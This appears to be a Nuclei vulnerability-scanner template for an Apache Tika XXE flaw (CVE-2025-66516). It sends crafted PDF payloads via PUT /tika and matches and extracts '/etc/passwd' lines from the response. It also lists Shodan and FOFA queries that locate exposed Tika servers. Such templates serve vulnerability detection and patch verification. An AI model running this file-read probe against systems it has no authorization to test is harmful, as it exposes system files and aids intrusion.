id: CVE-2025-66516

info:
  name: Apache Tika - XML External Entity Injection
  author: MathematicianGoat
  severity: high
  description: |
    Apache Tika tika-core (1.13-3.2.1), tika-pdf-module (2.0.0-3.2.1), and tika-parsers (1.13-1.28.5) contain an XML External Entity injection caused by processing crafted XFA files inside PDFs, letting attackers perform XXE attacks remotely. Exploitation requires crafted PDF input.
  impact: |
    Attackers can exploit the XXE to read local files or cause a denial of service, potentially exposing sensitive information or disrupting the service.
  remediation: |
    Upgrade tika-core to >= 3.2.2 and ensure tika-pdf-module and tika-parsers are updated to the latest versions.
  reference:
    - https://github.com/chasingimpact/CVE-2025-66516-Writeup-POC
    - https://nvd.nist.gov/vuln/detail/CVE-2025-66516
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 9.8
    cve-id: CVE-2025-66516
    epss-score: 0.01579
    epss-percentile: 0.81895
    cwe-id: CWE-611
  metadata:
    max-request: 2
    verified: true
    shodan-query: title:"Apache Tika"
    fofa-query: title="Apache Tika"
  tags: cve,cve2025,apache,tika,xxe,pdf,lfr

variables:
  passwd_payload: "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"
  canary_payload: "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"

http:
  - raw:
      - |
        PUT /tika HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/pdf

        {{base64_decode(passwd_payload)}}
      - |
        PUT /tika HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/pdf

        {{base64_decode(canary_payload)}}

    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: regex
        part: body_1
        regex:
          - "root:.*:0:0:"

      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains_any(body_2, "FileNotFoundException", "No such file")'
        condition: and

    extractors:
      - type: regex
        part: body_1
        group: 1
        regex:
          - 'data:\s*(root:x:0:0:[^\n]+)'
# digest: 4a0a00473045022100c71be0ac3350dfd3de35ba3ba5a7f4db7bdf83eef3f835b18d6ae6c18cddfe94022032931fb21495cc2676432bcc00a058b4a8d8f1221f4033a53070dd981fa1a95e:922c64590222798bb761d5b6d8e72950